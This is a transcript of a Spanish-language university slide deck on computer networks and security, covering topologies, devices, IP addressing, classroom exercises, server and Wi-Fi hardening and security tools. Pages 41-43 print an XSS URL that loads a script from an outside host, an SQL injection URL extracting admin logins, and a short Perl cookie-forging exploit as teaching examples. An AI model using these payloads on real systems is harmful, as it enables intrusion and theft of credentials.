v. seguridad informÁtica: las redes. universidad latina

57
V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA.

Upload: soledad-herrera-carrasco

Post on 02-Feb-2016

242 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

V. SEGURIDAD INFORMÁTICA: LAS REDES.

UNIVERSIDAD LATINA.

Page 2: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

DEFINICIÓN DE RED

Una red informática está constituida por un conjunto de ordenadores y otros dispositivos, conectados por medios físicos o sin cable, con el objetivo de compartir unos determinados recursos. Éstos pueden ser aparatos (hardware), como impresoras, sistemas de almacenamiento, etc., o programas (software), que incluyen aplicaciones, archivos, etc.

Page 3: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

TIPOS DE REDES• Según su alcance

– PAN– LAN– MAN– WAN

• Según el medio de propagación– Alámbrica– Inalámbrica

• Según su topología

Page 4: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Tipos de redes según su cobertura• PAN: Red de área personal. Interconexión de dispositivos en

el entorno usuario. Ejemplo: móvil, manos libros. Medio Infrarrojo, o bluetooth.

• LAN: Red de área local. Su extensión esta limitada físicamente a un edificio o a un entorno de hasta 200 metros. Ejemplo: Instituto.– WLAN: Red local inalámbrica

• MAN: Red de área metropolitana. Conjunto de redes LAN, en el entorno de un municipio. – WIMAX: red inalámbrica en el entorno de unos 5 a 50 km.

• WAN: Una Red de Área Amplia (Wide Area Network ), es un tipo de red de computadoras capaz de cubrir distancias desde unos 100 hasta unos 1000 km, dando el servicio a un país o un continente.

Page 5: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Tipos de Red según el mediomedio Nombre Tipo de

transmisiónVelocidad Distancia

máxima

Físico Cable coaxial Señal eléctrica Hasta 10 Mb/s 185 m

Pares trenzados

Señal eléctrica Hasta 1 Gb/s <100m

Fibra óptica Haz de luz Hasta 1 Tb/s <2 Km

Sin cables WI-FI Ondas electromagnética

Hasta 100 Mb/s <100m

Bluetooth Ondas electromagnética

Hasta 3Mb/s 10 m

Infrarrojos Onda electromagnética

Hasta 4Mb/s <1 mAngulo 30º

Page 6: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Tipos de Redes según su Topología

• Redes en bus: Comparten canal de transmisión– Fallo en cable central,

perdida de red.– Acumulación de datos.

Page 7: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Tipos de Redes según su Topología

• Topología en anillo: forman un anillo cerrado. La información circula en un sentido y cada ordenador analiza si él es el destinatario de la información.– Si uno de los ordenadores falla

se pierde la red. – Velocidad de la información

lenta– Red simple.

Page 8: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Tipos de Redes según su Topología Topología en estrella: Todos los

ordenadores están conectados a un dispositivo que se encarga de transmitir la información. Hub o concentrador, o Switch o conmutador. Ventaja: Cada nodo es independiente del

resto. Si es un concentrador, envía la

información a todos los ordenadores de la red. La comunicación se ralentiza.

Si es un conmutador o switch, envía la información solo al ordenador al que va destinado.

Page 9: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Tipos de Redes según su Topología

• Cada nodo está conectado al resto de los equipos con más de un cable. – Red segura a prueba de

fallos.– Red costosa requiere

más cable.

Page 10: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Tipos de Redes según su Topología Red en árbol: parecida a una

serie de redes en estrella. Tiene un nodo de enlace troncal, generalmente ocupado por un hub o switch, desde el que se ramifican los demás nodos. Ventajas: permite conectar

mayor número de equipos. Inconvenientes: Difícil

configuración. Si falla el segmento principal la red se pierde.

Page 11: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Tipos de Redes según su Topología Red de malla: es una topología de red en la

que cada nodo está conectado a todos los nodos. De esta manera es posible llevar los mensajes de un nodo a otro por distintos caminos.

Si la red de malla está completamente conectada, no puede existir absolutamente ninguna interrupción en las comunicaciones.

Cada servidor tiene sus propias conexiones con todos los demás servidores.

Page 12: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Dispositivos de Red• Tarjeta de Red• Cables de conexión• Concentrador o Hub• Conmutador o Switch• Router.

Page 13: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

La tarjeta de red

• Permite conectar nuestro equipo a la red.

• Normalmente se instala en la placa base.• Cada tarjeta tiene un identificador

denominado MAC, seis pares de dígitos, no puede haber dos tarjetas con el mismo identificador MAC. Formado por seis pares de números

• Forma de conocer la MAC: Desde interprete de comandos

– Comandos: getmac o ipconfig/all (dirección física)

Page 14: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Cables de conexión• Es el medio físico por el que viaja la

información de los equipos hasta los concentradores o conmutadores.

Page 15: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Cable coaxial• Posee dos conductores concéntricos,

– uno central, encargado de llevar la información,

– y uno exterior, de aspecto tubular, llamado malla o blindaje, que sirve como referencia de tierra y retorno de las corrientes.

– Entre ambos se encuentra una capa aislante llamada dieléctrico,

• Se ha sustituido paulatinamente

Page 16: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

El cable de pares trenzados

• Es el cable más utilizado actualmente para redes locales.

• Está formado por cuatro pares de hilos. Cada par está trenzado para evitar interferencias radioeléctricas.

• Los problemas que presenta son la atenuación, que es la pérdida de señal.

• En los extremos del cable es necesario un conector, RJ-45.

Page 17: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

La fibra óptica• Está formada por

filamentos de vidrio que son capaces de transportar los paquetes de información como haces de luz producidos por un láser.

• Velocidad de transmisión de hasta 10 Tb/s.

Page 18: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Concentrador o Hub• Recibe un paquete de datos a través

de un puerto y lo transmite al resto. • Esto provoca que la información no la

reciba sólo el equipo al cual va dirigida sino también los demás, lo que puede implicar un problema de saturación de la red, ralentización de la red.

Page 19: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Conmutador o Switch• Almacena las direcciones MAC (Dirección

física de la tarjeta de red) de todos los equipos que están conectados a cada uno de sus puertos.

• Cuando recibe un paquete a través de un puerto, revisa la dirección MAC a la que va dirigido y reenvía el paquete por el puerto que corresponde a esa dirección, dejando los demás libres de tránsito.

• Esta gestión más avanzada de la red permite mayor tránsito de datos sin saturarla.

Page 20: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Router o enrutador• Destinado a interconectar diferentes redes entre

sí. Por ejemplo, una LAN con una WAN o con Internet.

• Si utilizamos un enrutador para conectarnos a Internet a través de la tecnología ADSL, aparte de conectar dos redes (la nuestra con Internet), el router también tendrá que traducir los paquetes de información de nuestra red al protocolo de comunicaciones que utiliza la tecnología ADSL, función que antes realizaban los modem.

• Hoy en día los routers incorporan tecnología WI-FI, para conectar portátiles. También disponen de más de un puerto de conexión, lo que les convierte en switchs.

Page 21: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Protocolo TCP/IP• Para comunicar ordenadores debemos utilizar

un conjunto de reglas establecidas que constituyen un protocolo común. Los protocolos más importantes son el TCP/IP.– IP (protocolo de Internet). Es el protocolo para transmitir

información por Internet.– TCP (protocolo de control de transmisiones). Crea conexiones

entre ordenadores utilizando un lenguaje común y evita errores de transmisión.

Page 22: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

La dirección IP• Cada equipo que pertenece a una red dispone un identificador único

dirección IP.• La dirección IP está formado por 4 números de tres dígitos cada uno (de 0

a 255):• Los tres primeros dígitos son iguales para ordenadores que forman parte

de la misma red• El cuarto dígito es identificador del equipo dentro de la red.• La dirección IP de un ordenador debe ser única dentro de la misma red

Page 23: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

La máscara de red• En una red pueden crearse distintas subredes.

Para diferenciar los equipos que pertenecen a las distintas subredes de una LAN, se utilizan las máscaras subred.

• La máscara de red está formada por cuatro dígitos de tres cifras cada uno.

• Dentro de la misma subred todos los ordenadores tienen la misma máscara de red.

Page 24: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Puerta de enlace predeterminada• Será la dirección IP del router,

switch o elemento enrutador de la red. Nuestro equipo deberá encontrarse en el rango de su red, es decir, sus tres primeras cifras serán iguales a su puerta de enlace, y la última será diferente.

• Si tenemos de puerta de enlace 192.168.0.1, nuestro equipo debe tener una dirección IP 192.168.0.X (X se debe encontrar entre 2-255).

Page 25: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Direcciones de Servidor (DNS),– (Domain Name System) Son nombres de

proveedores de internet. Nuestro proveedor de Internet nos facilitará dos direcciones DNS para evitar la falta de servicio en el caso de perdida o saturación de una de ellas.

Page 26: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Modelo OSI– La ISO (Organización Internacional de

Normalización) en 1977 desarrolla una estructura de normas comunes dentro de las redes.

– Estas normas se conocen como el Modelo de Referencia OSI (interconexión de sistemas abiertos), modelo bajo el cual empezaron a fabricar computadoras con capacidad de comunicarse con otras marcas.

Page 27: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Las 7 capas de una red según el modelo OSI

Page 28: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

PRÁCTICA 1

• Abre la consola o línea de comandos (Inicio, ejecutar, cmd) y ejecuta la instrucción ipconfig/all.

• Interpreta los resultados.– a) ¿Cuál es la dirección física de la tarjeta de red?– b)¿Cuál es la dirección IP de tu equipo?– c) ¿Cuál es la dirección del router?

Page 29: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

PRÁCTICA 2: Nombre de equipo y grupo de trabajo

• Para crear una red lo primero que debemos tener en cuenta es el nombre de equipo y el grupo de trabajo, del que formamos parte.

• Debemos acudir a:– INICIO/MI PC/BOTÓN DERECHO DEL

RATÓN/PROPIEDADES/NOMBRE DE EQUIPO.

Page 30: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

PRÁCTICA 3:Analizar los equipos de la red

• Acudir a MIS SITIOS DE RED• Normalmente se encuentra como acceso directo en el

escritorio o en el menú Inicio.

• Ver equipos de red

Page 31: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

PRÁCTICA 4: Compartir una carpeta

• Nos situamos encima de la carpeta• Hacemos clic con el botón derecho del ratón.• Hacemos clic en la opción Compartir y seguridad.• Configuramos el nombre de la carpeta.• Marcamos compartir esta carpeta en la red.• Marcamos Permitir que otros usuarios de la red

cambien mis archivos, si deseamos que otros modifiquen nuestros archivos.

• Aplicar.

Page 32: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad en Internet

- ES EL PROCESO DE ASEGURAR LOS AMBIENTES EN LOS SERVIDORES Y PLATAFORMAS WEB ASI COMO LA PROTECCION DE LAS REDES Wi-FI ESTABLECIENDO ACCIONES DE PROTECCION Y SUS RECOMENDACIONES.

Page 33: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA

CONFIDENCIALIDAD

INTEGRIDAD

DISPONIBILIDAD

AUTENTICIDAD

Page 34: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad InformáticaCONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA

No existe la absoluta seguridad !!Todo es rompible si se le aplica fuerza. Una caja de vidrio se puede romper, pero también una caja fuerte de titanio. ¿Qué es más seguro: la caja de vidrio o la de titanio?

Evidentemente la de titanio, pero esto depende solamente de que herramienta utilicemos para romperla.

Todo se puede vulnerar. La única razón por la cual utilizamos rejas de fierros en nuestras casas y los bancos es porque hace que el ataque sea más lento.

Page 35: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad InformáticaCONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA

Entonces, ¿Cómo nos protegemos de la forma más eficiente posible?

Determinando que queremos proteger (ej: Hardware, datos privados, datos públicos, sistemas, etc) Estableciendo prioridades de los factores a proteger Formando políticas de seguridad Manteniendo la seguridad en el tiempo

Page 36: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

http://www.seguridad-informatica.cl

CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA

Debemos enfocarnos en REDUCIR EL RIESGO, y no en tratar de eliminar las amenazas, ya que es imposible.

Para eso debemos saber de QUE o QUIENES nos protegemos y también COMO nos atacan.

Page 37: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

http://www.seguridad-informatica.cl

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Page 38: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

http://www.seguridad-informatica.cl

Ataques Internos

- Premeditación (Empleados mal intencionados o ex empleados con información privilegiada)- Descuido- Ignorancia- Indiferencia de las politicas de seguridad

Ataques externos

-- Hackers, Crackers, Lammers, Script-Kiddies-- Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen test), etc.

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Page 39: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

http://www.seguridad-informatica.cl

Ataques Internos

• Suplantación de identidad• Sniffing (Incluso administradores pueden hacer sniffing. Sugerencia: CIFRAR)• Robo de información (Ej: para la competencia)• Virus, Troyanos, Gusanos• Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc Keylogging - Keycatching

Keycatcher:

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Page 40: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

http://www.seguridad-informatica.cl

Ataques Externos

• Ataques contra servicios WEB• Cross Site Scripting (XSS)• SQL Injection• Exploits• Robo de Identidad• Denegación de Servicio (DoS) y Denegación de Servicio Distribuido (DDoS)• SPAM• VIRUS• Phishing (Whishing, Hishing)• Troyanos

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Page 41: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

XSS: del inglés Cross-site scripting es un tipo de inseguridad informática o agujero de seguridad típico de las aplicaciones Web, que permite a una tercera parte inyectar en páginas web vistas por el usuario código JavaScript o en otro lenguaje script similar (ej: VBScript), evitando medidas de control como la Política del mismo origen. Este tipo de vulnerabilidad se conoce en español con el nombre de Secuencias de comandos en sitios cruzados.

http://docs.info.apple.com/article.html?artnum=';a=document.createElement('script');a.src='http://h4k.in/i.js';document.body.appendChild(a);//\';alert(1)//%22;alert(2)//\%22;alert(3)//--%3E

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Page 42: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

SQL Injection: Inyección SQL es un método de infiltración de código intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar consultas a una base de datos.

http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Page 43: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

#!/usr/bin/perl use LWP::UserAgent;use HTTP::Cookies;$host=shift;if ($host eq "") {print "Usage: webeye-xp.pl <host name>\n";exit;}my $browser = LWP::UserAgent->new();my $resp = $browser->get("http://$host/admin/wg_user-info.ml","Cookie","USER_ID=0; path=/;");$t = $resp->content;#print $t;";

Ejemplo de un exploit en PERL:Exploit (del inglés to exploit, ‘explotar’ o ‘aprovechar’) es un fragmento de software, fragmento de datos o secuencia de comandos y/o acciones, utilizada con el fin de aprovechar una vulnerabilidad de seguridad de un sistema de información para conseguir un comportamiento no deseado del mismo

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Page 44: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

http://www.seguridad-informatica.cl

¿COMO NOS DEFENDEMOS?

Debemos crear una lista de ”mandamientos” que debemos seguir al pie de la letra.

No olvidarse que el hecho de no cumplir con alguno de estos mandamientos inevitablemente caeremos en un mayor riesgo para los servicios que queremos proteger.

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Page 45: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

LOS MANDAMIENTOS MAS IMPORTANTES DE SEGURIDAD

Siempre respetar las políticas de seguridad Siempre tener nuestros servicios actualizados a la última versión conocida estable Utilizar mecanismos de criptografía para almacenar y transmitir datos sensibles Cambiar las claves cada cierto tiempo Auto-auditar nuestros propios servicios. Autoatacarnos para saber si somos o no vulnerables Estar siempre alerta. Nunca pensar ”a nosotros nadie nos ataca”. No dejar respaldos con información sensible en directorios web No usar las mismas claves para servicios distintos (ej, la clave de root sea la misma que la de MySQL)

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Page 46: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

SERVICIOS DE INTERNET

- Cambiar los puertos por defecto

- Garantizar el acceso solo a cuentas específicas

- Aplicar técnicas de Hardening

- Para servicios privados y confidenciales utilizar túneles seguros (VPN cifradas) en Internet y redes no seguras

- Eliminar todos los banners posibles y sobre todo las versiones

- Habilitar módulos de seguridad (Ej mod_security en Apache)

- Levantar Firewalls e IDS/IPS

- Crear cuentas de sistema restringidas (aunque no tengan privilegios)

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Page 47: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

- Nunca trabajar con ”root” si no es estrictamente necesario

- Proteger con doble contraseña si es posible

- Elegir contraseñas seguras, mezclando mayúsculas, minúsculas, números y caracteres especiales. Las claves no deben ser palabras coherentes (ej: Admin25)

- Cerrar puertos y eliminar aplicaciones innecesarias

- Borrar robots.txt y estadísticas públicas

- Proteger las URL (ej: mod_rewrite)

SERVICIOS DE INTERNETSERVICIOS DE INTERNET

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Page 48: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

http://www.seguridad-informatica.cl

SERVICIOS DE INTERNET

- Tener cuidado con los archivos temporales en directorios WEB. Ejemplo:index.php~ (terminados en caracter “squiggle” o “pigtail (literalmente: cola de chancho)”

- Realizar respaldos periódicamente y probar que funcionen

- Conocer las técnicas de ataque más conocidas

- Auditar los códigos con herramientas de seguridad

- Si ejecutan algún servidor de base de datos, permitir solamente comunicación con interfaz loopback y no dejar sin contraseña las bases de datos.

- En lo posible no utilizar servicios como: - WEBMIN - phpMyAdmin - Interfaces WEB en routers o dispositivos de red

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Page 49: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

http://www.seguridad-informatica.cl

UN POCO MAS DE SEGURIDAD CON APACHE Y PHP

Apache. En httpd.conf activar las siguientes directivas:

ServerTokens ProdServerSignature OffServerAdmin <[email protected]>

habilitar mod_security y mod_rewrite

PHP .En php.ini

php_expose=off“esconde php”mode_safe=on evita que se ejecuten funciones como system(), passthru(), exec(), etc.

evitar scripts con phpinfo();

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Page 50: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

http://www.seguridad-informatica.cl

PROTECCIÓN DE REDES WI-FI

Page 51: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

http://www.seguridad-informatica.cl

PROTECCIÓN DE REDES WI-FI

EL GRAN PROBLEMA DE LAS REDES WI-FI ES GRAN EXTENSIÓN FÍSICA (No hay cables) LO QUE CONLLEVA A QUE SEA MÁS FÁCIL ACCEDER A ELLAS REMOTAMENTE

EXISTEN UNA SERIE DE MEDIDAS QUE SE PUEDEN TOMAR PARA REDUCIR EL RIESGO DE ATAQUES.

Page 52: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

http://www.seguridad-informatica.cl

PROTECCIÓN DE REDES WI-FI

Apagar el router o access point cuando no se ocupe

Nunca entregar la clave Wi-Fi a terceros

Utilizar claves de tipo WPA2. Como segunda opción WPA y en el peor de los casos WEP (128 y 64 bits)

Habilitar el control de acceso por MAC. Son fáciles de clonar pero pone una barrera más

Deshabilitar servicios innecesarios en el router (SNMP, Telnet, SSH, etc)

Deshabilitar el acceso inalámbrico a la configuración

Cambiar los puertos por defecto de los servicios necesarios en el router (ej: http a 1000)

Desactivar el broadcasting SSID

Desactivar DHCP. Utilizar sólo IP manuales dentro de rangos poco convencionales. (Ej: 90.0.10.0 – 90.0.10.254)

Usar VPN si fuese posible.

Page 53: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad InformáticaPROTECCIÓN DE REDES WI-FI

Cambiar regularmente las claves Wi-Fi (tanto administración como clave de red).

Guardar bien las claves de administración

Usar contraseñas complicadas. (Ej: E_aR@_1-x

No usar dispositivos Wi-Fi cerca de hornos microondas ni teléfonos inalámbricos

Realizar un scaneo local de las redes disponibles para evitar interferencias.

LOS CANALES QUE NO SE INTERFIEREN SON: 1, 6 y 11

Page 54: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

http://www.seguridad-informatica.cl

HERRAMIENTAS DE SEGURIDAD

Page 55: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad Informática

http://www.seguridad-informatica.cl

HERRAMIENTAS DE SEGURIDAD COMERCIALES

GFI LANGUARD SECURITY SCANNERGFI LANGUARD SECURITY SCANNERwww.gfi.com

N-Stalker (ex N-Stealth)N-Stalker (ex N-Stealth)www.nstalker.com

ACUNETIX WEB SCANNERACUNETIX WEB SCANNERwww.acunetix.com

Page 56: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

Seguridad InformáticaHERRAMIENTAS DE SEGURIDAD

GRATIS

NMAP (Network Mapper)NMAP (Network Mapper)www.insecure.org/nmap NESSUSNESSUS

www.nessus.org

Page 57: V. SEGURIDAD INFORMÁTICA: LAS REDES. UNIVERSIDAD LATINA

GRACIAS POR TU ATENCIÓN ..!.